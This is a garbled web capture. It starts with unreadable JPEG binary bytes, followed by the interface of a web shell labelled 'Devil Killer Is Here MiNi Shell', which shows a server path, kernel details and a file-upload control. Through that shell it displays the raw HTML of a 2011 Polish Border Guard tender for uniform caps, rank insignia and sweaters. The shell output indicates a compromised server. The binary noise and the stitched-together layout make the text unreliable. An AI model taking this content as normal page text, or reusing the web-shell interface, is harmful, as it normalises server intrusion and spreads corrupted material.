JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110408/70868-N-2011.html

<p class="kh_header"><b>Warszawa: Dostawa 400 sztuk czapek garnizonowych SG, 400 sztuk czapek garnizonowych letnich SG, 400 sztuk czapek polowych, 400 sztuk taśm otokowych do czapki garnizonowej, 600 par oznak stopni do umundurowania wyjściowego, 400 sztuk oznak stopni do kurtki służbowej SG, 400 sztuk oznak stopni do czapki polowej, 800 par oznak stopni do umundurowania polowego, 500 sztuk swetrów koloru khaki - sprawa nr 14/ZP/BTiZ/11.</b><br>
<b>Numer ogłoszenia: 70868 - 2011; data zamieszczenia: 08.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół do Spraw Zamówień Publicznych Komendy Głównej Straży Granicznej , ul.  Podchorążych 38, 00-463 Warszawa, woj. mazowieckie, tel. 022 500 44 22, faks 022 500 47 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strazgraniczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa 400 sztuk czapek garnizonowych SG, 400 sztuk czapek garnizonowych letnich SG, 400 sztuk czapek polowych, 400 sztuk taśm otokowych do czapki garnizonowej, 600 par oznak stopni do umundurowania wyjściowego, 400 sztuk oznak stopni do kurtki służbowej SG, 400 sztuk oznak stopni do czapki polowej, 800 par oznak stopni do umundurowania polowego, 500 sztuk swetrów koloru khaki - sprawa nr 14/ZP/BTiZ/11..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nowych, pochodzących z bieżącej produkcji:
a) 400 sztuk czapek garnizonowych SG i 400 sztuk czapek garnizonowych letnich SG (CZĘŚĆ 1 zamówienia)
b) 400 sztuk czapek polowych (CZĘŚĆ 2 zamówienia)  
c) 400 sztuk taśm otokowych do czapki garnizonowej, 600 par oznak stopni do umundurowania wyjściowego, 400 sztuk oznak stopni do kurtki służbowej SG (CZĘŚĆ 3 zamówienia)
d) 400 sztuk oznak stopni do czapki polowej i 800 par oznak stopni do umundurowania polowego (CZĘŚĆ 4 zamówienia)
e) 500 sztuk swetrów koloru khaki (CZĘŚĆ 5 zamówienia)
Zamawiający dopuszcza składanie ofert częściowych na jedną lub więcej CZĘŚCI zamówienia tj. według podziału przedmiotu zamówienia na wyżej wymienione CZĘŚCI z zachowaniem rodzaju i ilości przedmiotu zamówienia.
Wykonawca zobowiązany jest do dostarczenia wraz z ofertą wzoru oferowanego przedmiotu zamówienia. Zamawiający w celu zachowania jednolitości w umundurowaniu funkcjonariuszy SG, udostępni do wglądu w swojej siedzibie wzory przedmiotów użytkowanych w SG..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.44.33.20-5, 39.56.00.00-5, 18.23.53.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium przez Wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dokonano konkretyzacji warunku określonego w pkt. III.3.1)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku określonego w pkt. III.3.2) Wykonawca winien wykazać się, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał a w przypadku świadczeń okresowych lub ciągłych wykonuje następujące dostawy: 

a) w przypadku Wykonawców składających ofertę w CZĘŚCI 1 zamówienia - co najmniej  1 dostawę w ilości nie mniejszej niż 200 sztuk czapek odpowiadających swoim rodzajem przedmiotowi zamówienia,

b) w przypadku Wykonawców składających ofertę w CZĘŚCI 2 zamówienia - co najmniej 1 dostawę w ilości nie mniejszej niż 200 sztuk czapek odpowiadających swoim rodzajem przedmiotowi zamówienia,   

c) w przypadku Wykonawców składających ofertę w CZĘŚCI 3 zamówienia - co najmniej 1 dostawę w ilości nie mniejszej niż 400 sztuk lub 400 par przedmiotów o charakterze zbliżonym, co do złożoności przedmiotu zamówienia, tj. wykonanych metodą haftu komputerowego,

d) w przypadku Wykonawców składających ofertę w CZĘŚCI 4 zamówienia - co najmniej  1 dostawę w ilości nie mniejszej niż 400 sztuk lub 400 par przedmiotów o charakterze zbliżonym, co do złożoności przedmiotu zamówienia, tj. wykonanych metodą termo nadruku,

e) w przypadku Wykonawców składających ofertę w CZĘŚCI 5 zamówienia - co najmniej  1 dostawę w ilości nie mniejszej niż 300 sztuk swetrów odpowiadających swoim rodzajem przedmiotowi zamówienia,  
Wykonawca załączy do oferty dokument(y) potwierdzający(e), że dostawy te zostały wykonane lub są wykonywane należycie (np. referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dokonano konkretyzacji warunku określonego w pkt. III.3.3)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dokonano konkretyzacji warunku określonego w pkt. III.3.4)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dokonano konkretyzacji warunku określonego w pkt. III.3.5)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W zakresie CZĘŚCI 1 i 2 zamówienia: 
certyfikat zgodności na tkaninę zasadniczą użytą do wykonania oferowanej czapki, wydany przez akredytowaną jednostkę certyfikującą wyroby, po dokonaniu oceny typu wyrobu i kontroli procesu produkcji, potwierdzający spełnienie wymagań zawartych w opisie przedmiotu zamówienia,  

W zakresie CZĘŚCI 3 zamówienia:   
- w przypadku oznak stopni do umundurowania wyjściowego:

certyfikat zgodności na tkaninę zasadniczą użytą do wykonania przedmiotu zamówienia, wydany przez akredytowaną jednostkę certyfikującą wyroby, po dokonaniu oceny typu wyrobu i kontroli procesu produkcji, potwierdzający spełnienie wymagań zawartych w opisie przedmiotu zamówienia,  

- w przypadku taśm otokowych do czapek garnizonowych i oznak stopni do kurtki służbowej SG:

analizy, atesty, raporty z badań lub inne dokumenty, zawierające wskaźniki techniczno-użytkowe na tkaninę zasadniczą użytą do wykonania przedmiotu zamówienia, potwierdzające spełnienie wymagań zawartych w opisie przedmiotu zamówienia,  wystawione przez akredytowane laboratorium badawcze lub producenta tkaniny,  
 
W zakresie CZĘŚCI 4 zamówienia:
certyfikat zgodności na tkaninę zasadniczą użytą do wykonania oznak stopni, wydany przez akredytowaną jednostkę certyfikującą wyroby, po dokonaniu oceny typu wyrobu i kontroli procesu produkcji, potwierdzający spełnienie wymagań zawartych w opisie przedmiotu zamówienia,  

W zakresie CZĘŚCI 5 zamówienia:  
analizy, atesty, raporty z badań lub inne dokumenty, zawierające wskaźniki techniczno-użytkowe dzianiny i tkaniny użytej do wykonania przedmiotu zamówienia, potwierdzające spełnienie wymagań zawartych w opisie przedmiotu zamówienia, wystawione przez akredytowane laboratorium badawcze lub inne laboratorium posiadające nadzorowane wyposażenie pomiarowo-badawcze (np. laboratorium zakładowe).  

W zakresie CZĘŚCI 1 - 5  zamówienia, tj. odrębnie do każdej z CZĘŚCI: 
- dokumentację techniczno - technologiczną (w polskiej wersji językowej), dotyczącą wytwarzania oferowanego przedmiotu zamówienia, która powinna zawierać co najmniej następujące informacje:

- opis przedmiotu zamówienia,
- rysunek (rysunki), 
- wymagania techniczne (zawierające m.in. wykaz materiałów i dodatków niezbędnych do wykonania przedmiotu zamówienia), 
- opis sposobu wykonania przedmiotu zamówienia oraz jego oznaczenia, 
- tabelę wymiarów (należy podać tylko w dokumentacji dotyczącej CZĘŚCI 5 zamówienia)
- opis sposobu pakowania.

Dokumentacja techniczno - technologiczna oferowanego przedmiotu zamówienia musi być opatrzona danymi identyfikującymi Wykonawcę.  Zaleca się, aby była ona opatrzona również nazwą i numerem niniejszego postępowania o udzielenie zamówienia oraz podpisana przez osobę(y) upoważnioną(e) do reprezentowania Wykonawcy.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsce zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania przy zachowaniu terminów wystawienia wymaganych dla poszczególnych rodzajów dokumentów, o których mowa w pkt. III.4.3.1)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.strazgraniczna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół ds. Zamówień Publicznych KGSG, ul. Podchorążych 38, 00-463 Warszawa, budynek nr 5. Tel. kont. 22 500 44 22 lub 43 89..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2011 godzina 10:00, miejsce: Kancelaria Zespołu ds. Zamówień Publicznych KGSG, ul. Podchorążych 38, 00-463 Warszawa, budynek nr 5, pokój nr 229 (od poniedziałku do piątku w godz. 8.30-15.30).
Tel. kont. 22 500 44 22 lub 43 72..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa 400 sztuk czapek garnizonowych SG i 400 sztuk czapek garnizonowych letnich SG..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 400 sztuk czapek garnizonowych SG i 400 sztuk czapek garnizonowych letnich SG. Wymagany okres gwarancji na przedmiot zamówienia wynosi minimum 12 miesięcy od daty wydania przedmiotu zamówienia do użytkowania.
Okres przechowywania przedmiotu zamówienia przez Zamawiającego w magazynie wynosi maksymalnie 5 lat.
Wykonawca zobowiązany jest do dostarczenia wraz z ofertą wzorów oferowanych przedmiotów zamówienia  w pierwszym stopniu jakości, tj.:
a) czapkę garnizonową SG oficera starszego w ilości 1 szt., dla rozmiaru (obwód głowy) 56 cm.
b) czapkę garnizonową letnią SG oficera starszego w ilości 1 szt., dla rozmiaru (obwód głowy) 56 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.44.33.20-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 84.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa 400 sztuk czapek polowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 400 sztuk czapek polowych.
Wymagany okres gwarancji na przedmiot zamówienia wynosi minimum 12 miesięcy od daty wydania przedmiotu zamówienia do użytkowania.
Okres przechowywania przedmiotu zamówienia przez Zamawiającego w magazynie wynosi maksymalnie 5 lat.
Wykonawca zobowiązany jest do dostarczenia wraz z ofertą wzoru oferowanego przedmiotu zamówienia  w pierwszym stopniu jakości, tj.:
czapkę polową w ilości 1 szt., dla rozmiaru (obwód głowy) 56 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.44.33.20-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 84.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa 400 sztuk taśm otokowych do czapki garnizonowej, 600 par oznak stopni do umundurowania wyjściowego, 400 sztuk oznak stopni do kurtki służbowej SG..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 400 sztuk taśm otokowych do czapki garnizonowej, 600 par oznak stopni do umundurowania wyjściowego, 400 sztuk oznak stopni do kurtki służbowej SG. 
Wymagany okres gwarancji na przedmiot zamówienia wynosi minimum 12 miesięcy od daty wydania przedmiotu zamówienia do użytkowania.
Okres przechowywania przedmiotu zamówienia przez Zamawiającego w magazynie wynosi maksymalnie 5 lat.
Wykonawca zobowiązany jest do dostarczenia wraz z ofertą wzorów oferowanych przedmiotów zamówienia w pierwszym stopniu jakości, tj.:
a) taśmy otokowe do czapek garnizonowych w ilości 4 szt. i wg. stopni:
	plutonowy - 1 szt.,
	sierżant sztabowy - 1 szt.,
	młodszy chorąży - 1 szt.,
	3 gwiazdki - 1 szt.,
b) oznaki stopni do umundurowania wyjściowego w ilości 5 par i wg. stopni:
	plutonowy - 1 para,
	sierżant sztabowy - 1 para,
	młodszy chorąży - 1 para,
	porucznik - 1 para,
	pułkownik - 1 para,
c) oznaki stopni do kurtki służbowej SG w ilości 5 szt. i wg. stopni:
	plutonowy - 1 szt.,
	sierżant sztabowy - 1 szt.,
	młodszy chorąży - 1 szt.,
	porucznik - 1 szt.,
	pułkownik - 1 szt.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa 400 sztuk oznak stopni do czapki polowej i 800 par oznak stopni do umundurowania polowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 400 sztuk oznak stopni do czapki polowej i 800 par oznak stopni do umundurowania polowego.
Wymagany okres gwarancji na przedmiot zamówienia wynosi minimum 12 miesięcy od daty wydania przedmiotu zamówienia do użytkowania.
Okres przechowywania przedmiotu zamówienia przez Zamawiającego w magazynie wynosi maksymalnie 5 lat.
Wykonawca zobowiązany jest do dostarczenia wraz z ofertą wzorów oferowanych przedmiotów zamówienia w pierwszym stopniu jakości, tj.:
a) oznaki stopnia do czapki polowej w ilości 5 szt. i wg. stopni:
	plutonowy - 1 szt.,
	sierżant sztabowy - 1 szt.,
	młodszy chorąży - 1 szt.,
	porucznik - 1 szt.,
	pułkownik - 1 szt.,
b) oznak stopni do umundurowania polowego w ilości 5 par i wg. stopni:
	plutonowy - 1 para,
	sierżant sztabowy - 1 para,
	młodszy chorąży - 1 para,
	porucznik - 1 para,
	pułkownik - 1 para,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</p></li>
